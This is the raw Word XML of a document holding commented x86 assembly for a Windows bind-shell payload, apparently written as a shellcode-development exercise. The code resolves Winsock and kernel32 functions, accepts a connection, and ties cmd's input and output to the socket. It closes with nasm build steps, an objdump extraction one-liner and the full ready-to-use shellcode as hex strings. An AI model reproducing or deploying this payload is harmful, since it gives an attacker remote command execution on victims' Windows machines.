    <w:p w14:paraId="241C2BB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67C5D59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*ws2_32.dll, "accept"0x00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9FA79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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EE473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cx, 0x7470          ; tp : 7470 // "accept",0x0000 string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2EFBA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push "en",0x00,0x00 to stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B77D92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0x65636361         ; ecca : 65636361 - push "acce" to stack </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD2979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pointer-to-string to stack for 'accept',0x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0D6CD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[ebp-0x20]   ; push base address of ws2_32.dll to stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2714714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 to EAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564AAB7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GetProcAddress(PTR *ws2_32.dll, "accept")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A041E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;   EAX = listen() base-address </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640C2C2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[ebp-0x3c], eax     ; save Address of accept() onto Stack 0x3c=60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4207B99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3D67269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accept(ptr socketHandle, ptr sockaddr_in, ptr addrlen(optional))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393FBE0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sockaddr_in is optional here. It is for filtering the connecting host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D68F5B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA7670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push Null for optional ptr addrlen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1727CFC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push Null for optional ptr sockaddr_in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5A0E0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[ebp-0x2c]   ; push socket handle returned from WSASocketA()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D835F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[ebp-0x3c]     ; load address of accept() that we saved eariler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9B63C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Call the accept() function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0350A13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[ebp-0x40], eax     ; save Handle to clientSocket, returned form accept(), onto Stack 0x40=64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47458A7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51DE5FC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struct _PROCESS_INFORMATION {PTR hProcess; PTR hThread; DWORD dwProcessId; DWORD dwThreadId; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0E71D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edx, 0x646d6363     ; "ccmd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5432700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shr edx, 8              ; edx = "cmd",0x00 // shr edx, 8 = Shifts the edx register to the right 8 bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E002FA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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5831109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[ebp-0x44], esp     ; save PTR to String "cmd",0x00 on stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D55E1B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            ; clear edx register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C1358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sub esp, 0x10           ; Decrement the stack by 16 bytes (0x10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192F1BE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[ebp-0x48], esp     ; save Address of PROCESS_INFORMATION struct onto Stack 0x48=72</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4DB4D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2320ADF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; typedef struct _STARTUPINFOA { DWORD  cb; LPSTR  lpReserved; LPSTR  lpDesktop; LPSTR  lpTitle; DWORD  dwX; DWORD  dwY; DWORD  dwXSize; DWORD  dwYSize; DWORD  dwXCountChars; DWORD  dwYCountChars; DWORD  dwFillAttribute; DWORD  dwFlags; WORD   </w:t>
      </w:r>
      <w:r w:rsidRPr="009E59F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>wShowWindow; WORD   cbReserved2; LPBYTE lpReserved2; HANDLE hStdInput; HANDLE hStdOutput; HANDLE hStdError; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BDFC1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            ; clear edx register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7C329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Redirect STDIN, STDOUT, STDERR to the clientSocket returned from accept() when client connected (similar to dup2 in linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAE25A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[ebp-0x40]   ; HANDLE hStdError  = Handle to clientSocket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE713C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[ebp-0x40]   ; HANDLE hStdOutput = Handle to clientSocket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EE247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[ebp-0x40]   ; HANDLE hStdInput  = Handle to clientSocket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F9B00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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E33C1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2683EFC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clear eax register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E92877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inc eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46631EA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rol eax, 0x08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639C626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inc eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01790DC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eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C12296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dwFlags          = Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCBA21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dwFillAttribute  = Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42166F3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dwYCountChars    = Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B54FD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dwXCountChars    = Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C4FA8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dwXSize          = Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CB8D1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dwY              = Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F198B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DWORD dwX              = Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147C254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PTR lpTitle            = Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AFFB1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PTR lpDesktop          = Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F40DF2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PTR lpReserved         = Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BD926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clear eax register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A5DB3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add al, 0x44            ; DWORD cb               = 0x44(68) // Sizeof STARTUP_INFO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D7EBD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eax                ; push cb onto the stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107F00D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[ebp-0x4c], esp     ; save pointer to STARTUP_INFO struct onto Stack 0x4c=76</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7350870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735A187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*kernel32.dll, "CreateProcessA"0x00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6268D11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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A29323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dx, 0x4173          ; As : 4173 // "CreateProcessA",0x0000 string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49778AC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push "sA",0x0000 to stack from end of string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1382E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0x7365636f         ; seco : 7365636f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2991C1D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0x72506574         ; rPet : 72506574</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C7355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0x61657243         ; aerC : 61657243</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105646B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 to string to stack for 'CreateProcessA',0x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E29FF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[ebp-0x8]    ; push base address of kernel32.dll to stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09205C6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 to EAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39862E7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GetProcAddressA(PTR *kernel32.dll, "CreateProcessA"0x00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB2656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EAX = CreateProcessA Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E8DAC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[ebp-0x50], eax     ; save Address of CreateProcessA onto Stack 0x50=80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411E3E0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403EEA7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CreateProcessA(NULL, Command, NULL, NULL, TRUE, 0, NULL, NULL, &amp;sui, &amp;pi);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B6839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            ; clear edx register</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE425C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[ebp-0x48]   ; PROCESS_INFORMATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778B2EC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[ebp-0x4c]   ; STARTUP_INFO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318E1AB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lpCurrentDirectory = Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A41F4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lpEnvt = Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5081C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dwCreationFlags = 0/Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8F250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eax, eax            ; clear eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378C5BC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inc eax                 ; bInheritHandles = True = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAAB4A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eax                ; push 1 to stack for bInheritHandles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E0EA5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lpThdAttrs = Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708BFC7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lpPsAttrs  = Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4561B67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[ebp-0x44]   ; lpCmdLine = push PTR to String "cmd",0x00 on stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A23E3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edx                ; lpAppName = Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3979E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ebx, [ebp-0x50]     ; Address for CreateProcessA </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670770E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ebx                ; create process cmd </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23835F3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01E82F7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GetProcAddress(PTR *kernel32.dll, "ExitProcess"0x00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4371154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ecx, ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644A687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ecx, 0x73736501     ; sse : 73736501 = 0x01,"ess" // "ExitProcess",0x0000 string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1595762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shr ecx, 8              ; ecx = "ess",0x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E21AA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ecx                ;  sse : 00737365 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A25F8E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0x636f7250         ; corP : 636f7250</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCB57A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0x74697845         ; tixE : 74697845</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEEFE2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esp                ; push pointer to string to stack for 'ExitProcess',0x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179A1A5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dword [ebp-0x8]    ; push base address of kernel32.dll to stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF1E14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[ebp-0x18]     ; PTR to GetProcAddressA to EAX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135B96C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                ; GetProcAddressA(PTR *kernel32.dll, "ExitProcess"0x00)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB3A55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EAX = ExitProcess Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DB913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[ebp-0x54], eax     ; save Address of ExitProcess onto Stack 0x54=84</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035DC55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3F67770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Call ExitProcess(exitcode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4E807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xor edx, edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A33A2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push eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFB042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mov eax, [ebp-0x54]     ; ExitProcess(exitcode)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DAE3B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call eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555E0A6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13C1794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0056F95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sub esp, 0x60 = Dec stack by 0x96 for shellcode variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A8D9F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[ebp-0x4]  = PTR to string at bottom of stack (ebp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBFDF7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[ebp-0x8]  = Save the base address of kernel32.dll in the 2nd from bottom position on our stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EED63B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[ebp-0xC]  = Address of Name-Pointer Table in the 3rd from bottom position in our stack-frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14179B9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[ebp-0x10] = PTR to Ordinal Table Address at 4th from bottom of stack (ebp-16)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B861C4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>;   [ebp-0x14] = PTR to Address Table Address at 5th from bottom of stack (ebp-20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048B96B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[ebp-0x18] = Address of GetProcAddress onto Stack 0x18=24; 6th from bottom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A219D4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[ebp-0x1c] = Address of LoadLibraryA onto Stack 0x1c=28; 7th from bottom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769BB2D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[ebp-0x20] = Address of ws2_32.dll onto Stack at 0x20=32; 8th from bottom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E28BA4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[ebp-0x24] = Address of WSAStartup onto Stack 0x24=36; 9th from bottom.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7FC78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[ebp-0x28] = Address of WSASocketA onto Stack 0x28=40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40158E2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[ebp-0x2c] = Address New Socket Handle onto Stack 0x2c=44</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FB7CC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[ebp-0x30] = Address of sockaddr_in struct onto Stack 0x30=48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEDEB5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[ebp-0x34] = Address of bind onto Stack 0x34=52</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216AC37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[ebp-0x38] = Address of listen() onto Stack 0x38=56</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D9C27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[ebp-0x3c] = Address of accept() onto Stack 0x3c=60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180609FA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[ebp-0x40] = Handle to clientSocket, returned form accept(), onto Stack 0x40=64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB97EE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[ebp-0x44] = PTR to String "cmd",0x00 on stack 0x44=68</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79456D6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[ebp-0x48] = Pointer to PROCESS_INFORMATION struct onto Stack 0x48=72</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778214C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[ebp-0x4c] = Pointer to STARTUP_INFO struct onto Stack 0x4c=76</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5464F25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[ebp-0x50] = Address of CreateProcessA onto Stack 0x50=80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB19C71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  [ebp-0x54] = Address of ExitProcess onto Stack 0x54=84</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCB74A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</w:p>
    <w:p w14:paraId="674780E3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# Compiled on Kali with nasm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D286A3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;root@kali# nasm -f win32 bindShell.asm -o bindShell.o</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527FB37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 for i in $(objdump -D bindShell.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0813F2B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# Preformated for the lazy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0053D35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 = "\x55\x89\xe5\x83\xec\x60\x31\xc0\x66\xb8\x73\x73\x50\x68\x64\x64\x72\x65\x68\x72\x6f\x63\x41\x68\x47\x65"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE0720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"\x74\x50\x89\x65\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x40\x1c\x89\xc3\x8b\x03\x89\xc3\x8b\x03\x8b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F84195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"\x40\x08\x89\x45\xf8\x8b\x58\x3c\x01\xc3\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7\x89\x7d\xf4\x8b\x4b\x24"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CD04D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"\x01\xc1\x89\x4d\xf0\x8b\x53\x1c\x01\xc2\x89\x55\xec\x8b\x53\x14\x31\xc0\x8b\x7d\xf4\x8b\x75\xfc\x31\xc9"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193E49C0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"\xfc\x8b\x3c\x87\x03\x7d\xf8\x66\x83\xc1\x0f\xf3\xa6\x74\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf0\x8b\x55\xec"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A0085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"\x66\x8b\x04\x41\x8b\x04\x82\x03\x45\xf8\x89\x45\xe8\x31\xd2\x52\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676CD748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"\x68\x4c\x6f\x61\x64\x54\xff\x75\xf8\x8b\x45\xe8\xff\xd0\x89\x45\xe4\x31\xc0\x66\xb8\x33\x32\x50\x68\x77"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558BD1A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"\x73\x32\x5f\x54\x8b\x5d\xe4\xff\xd3\x89\x45\xe0\x31\xd2\x66\xba\x75\x70\x52\x68\x74\x61\x72\x74\x68\x57"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF6CE1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lastRenderedPageBreak/>
        <w:t>;shellcode += "\x53\x41\x53\x54\xff\x75\xe0\x8b\x45\xe8\xff\xd0\x89\x45\xdc\x31\xdb\x66\xbb\x90\x01\x29\xdc\x54\x53\x8b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4DC4DD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"\x45\xdc\xff\xd0\x31\xd2\x66\xba\x74\x41\x52\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x54\xff\x75\xe0\x8b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4486311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"\x45\xe8\xff\xd0\x89\x45\xd8\x31\xdb\x53\x53\x53\x31\xc9\xb1\x06\x51\x43\x53\x43\x53\x8b\x45\xd8\xff\xd0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1550C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"\x89\x45\xd4\x31\xdb\x53\x66\x68\x11\x5c\x80\xc3\x02\x66\x53\x89\x65\xd0\x31\xc9\x51\x68\x62\x69\x6e\x64"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC81EC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"\x54\xff\x75\xe0\x8b\x45\xe8\xff\xd0\x89\x45\xcc\x6a\x10\xff\x75\xd0\xff\x75\xd4\x8b\x45\xcc\xff\xd0\x31"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3751C5AF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"\xc9\x66\xb9\x65\x6e\x51\x68\x6c\x69\x73\x74\x54\xff\x75\xe0\x8b\x45\xe8\xff\xd0\x89\x45\xc8\x31\xc9\x51"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57199B0C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"\xff\x75\xd4\x8b\x45\xc8\xff\xd0\x31\xc9\x66\xb9\x70\x74\x51\x68\x61\x63\x63\x65\x54\xff\x75\xe0\x8b\x45"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5DF859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"\xe8\xff\xd0\x89\x45\xc4\x31\xc9\x51\x51\xff\x75\xd4\x8b\x45\xc4\xff\xd0\x89\x45\xc0\xba\x63\x63\x6d\x64"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0D31C5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"\xc1\xea\x08\x52\x89\x65\xbc\x31\xd2\x83\xec\x10\x89\x65\xb8\x31\xd2\xff\x75\xc0\xff\x75\xc0\xff\x75\xc0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713B1852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"\x52\x52\x31\xc0\x40\xc1\xc0\x08\x40\x50\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52\x31\xc0\x04\x44\x50\x89"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0321061E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"\x65\xb4\x31\xd2\x66\xba\x73\x41\x52\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x54\xff"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F457D6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"\x75\xf8\x8b\x45\xe8\xff\xd0\x89\x45\xb0\x31\xd2\xff\x75\xb8\xff\x75\xb4\x52\x52\x52\x31\xc0\x40\x50\x52"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDA634B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"\x52\xff\x75\xbc\x52\x8b\x5d\xb0\xff\xd3\x31\xc9\xb9\x01\x65\x73\x73\xc1\xe9\x08\x51\x68\x50\x72\x6f\x63"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712007B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>;shellcode += "\x68\x45\x78\x69\x74\x54\xff\x75\xf8\x8b\x45\xe8\xff\xd0\x89\x45\xac\x31\xd2\x50\x8b\x45\xac\xff\xd0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D4DEA7" w14:textId="77777777" w:rsidR="00FA62EA" w:rsidRPr="009E59F5" w:rsidRDefault="00FA62EA" w:rsidP="009E59F5">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E59F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00000000" w:rsidRPr="009E59F5" w:rsidSect="009E59F5">
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="1440" w:right="1953" w:bottom="1440" w:left="19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F5"/>
    <w:rsid w:val="00004DD9"/>
    <w:rsid w:val="009E59F5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55065"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9D33F1E1-9835-714E-AADB-BF4A41D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59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9F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3993</Words>
  <Characters>22761</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>189</Lines>
  <Paragraphs>53</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>26701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2025-11-27T12:16:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-27T12:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>